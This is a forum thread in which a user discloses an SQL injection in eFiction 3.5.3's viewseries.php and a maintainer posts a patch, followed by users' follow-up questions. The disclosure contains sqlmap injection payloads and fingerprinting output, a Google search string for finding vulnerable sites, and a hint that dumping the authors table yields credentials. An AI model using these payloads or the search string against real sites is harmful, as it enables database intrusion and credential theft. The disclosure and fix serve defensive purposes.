Hello ...
The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":
$seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;
Then it passes the *tainted* value directly down to the database:
$parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");
This allows an attacker to extract information from the underlying database.
sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
---
Place: GET
Parameter: seriesid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
---
[20:37:41] [INFO] testing MySQL
[20:37:42] [INFO] confirming MySQL
[20:37:45] [INFO] the back-end DBMS is MySQL
[20:37:45] [INFO] fetching banner
[20:37:45] [INFO] retrieving the length of query output
[20:37:45] [INFO] retrieved: 20
[20:38:25] [INFO] retrieved: 5.1.69-community-log
[20:38:25] [INFO] actively fingerprinting MySQL
[20:38:28] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache, PHP 5.2.17
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
banner parsing fingerprint: MySQL 5.1.69, logging enabled
banner: '5.1.69-community-log'
Vulnerable sites can be found using Google by executing this search:
inurl:"viewseries.php?seriesid="
The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.
Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.
... Robert
UPDATE: zip-archive attached with the modified files.
Thanks for letting us know, here's a fix, and YOU NEED TO DO THIS A.S.A.P.
Step 1:
Open includes/mysqli_functions.php, find:
// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
return $dbconnect->real_escape_string($str);
}
Modify to:
// Used to escape text being put into the database.
function escapestring($str) {
global $dbconnect;
if (!is_array($str)) return $dbconnect->real_escape_string($str);
return array_map('escapestring', $str);
}
(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysql_functions.php, find at or around line 56:
// Used to escape text being put into the database.
function escapestring($str) {
if(version_compare(phpversion(),"4.3.0")=="-1") {
$str = mysql_escape_string($str);
} else {
$str = mysql_real_escape_string($str);
}
return $str;
}
Modify to:
// Used to escape text being put into the database.
function escapestring($str) {
if (!is_array($str)) return mysql_real_escape_string($str);
else return array_map('escapestring', $str);
}
This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.
Step 3:
Completely scratched for breaking several forms.
Step 4:
Open viewseries.php, find around line 36:
include(_BASEDIR."includes/pagesetup.php");
$seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;
change last line of above to:
$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;
First tests indicate this is
1) working
2) fixing the injection issue
3) should work now
Update #1: Added viewseries.php as file to be modified
Update #2: Fixed a typo above, Step 1 hits includes/mysqli_functions.php, Step 2 goes for includes/mysql_functions.php
Update #3: Convenience fix, packed the affected files in a zip-archive, just unpack and upload, do not edit anything else.
I am sorry, this may seem a bit unorganized, and in fact it is, which has to do with the fact that I am not really into the 3.5.3 code, I merely took the project over with the intention of bringing it to version 5.0.0, which is underway, but not quite ready for release.
Updated package is postponed, also, until this fix has become somewhat stable.
Ran a test, because $seriesid is straight forward used to build links, it still shows up as injected, but the actual DB query is safe.
I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows rn). I tried to remove these tags but it doesn't disapear. How could I remove these tags?
(You can skip step 2 if you know are using mysqli extension, if you are not sure, better do it.)
Step 2:
Open includes/mysqli_functions.php, find at or around line 56:// Used to escape text being put into the database.
function escapestring($str) {
if(version_compare(phpversion(),"4.3.0")=="-1") {
$str = mysql_escape_string($str);
} else {
$str = mysql_real_escape_string($str);
}
return $str;
}Modify to:
// Used to escape text being put into the database.
function escapestring($str) {
if (!is_array($str)) return mysql_real_escape_string($str);
else return array_map('escapestring', $str);
}This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.
I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?
I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so was assuming there's a tiny typo in step 2 or am I wrong and my files are different than expected somehow?
Yes, there was a typo in the instructions, Step 1 was mysqli, Step 2 mysql.
Thanks
I did this change but now when I click submit button everything is OK but when I want to echo inserted text, it shows between the lines "rn" (in database shows rn). I tried to remove these tags but it doesn't disapear. How could I remove these tags?
Holy Batman, fired a bit too far here ^^
I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.
Holy Batman, fired a bit too far here ^^
I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.
Thank you, now its ok
Thanks for the feedback, good to know.
Thank you for getting on this so quick!
Series doesnt show whit
$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;
I get error in line 39 viewseries.php.
But its ok if I use:
$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;
I dont know if it is ok to use this last code
Series doesnt show whit
$seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;I get error in line 39 viewseries.php.
But its ok if I use:
$seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;I dont know if it is ok to use this last code
Now I have no idea why that doesn't work for you, double checked with my test site and it's just fine there, but your version seems to be ok, too.
Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.
A quick search didn't find those lines of code in the files. There was similar code but not the same.
Please hurry up on the fixed version as at least I can upload that!
A quick search didn't find those lines of code in the files. There was similar code but not the same.
Please hurry up on the fixed version as at least I can upload that!
I copied the code from an original version of eFiction 3.5.3, so if you files did indeed differ, that's strange.
Anyway, couldn't sleep so made the hotfix, full package including a few other fixes that came up within the next days, got family festivities coming my way.
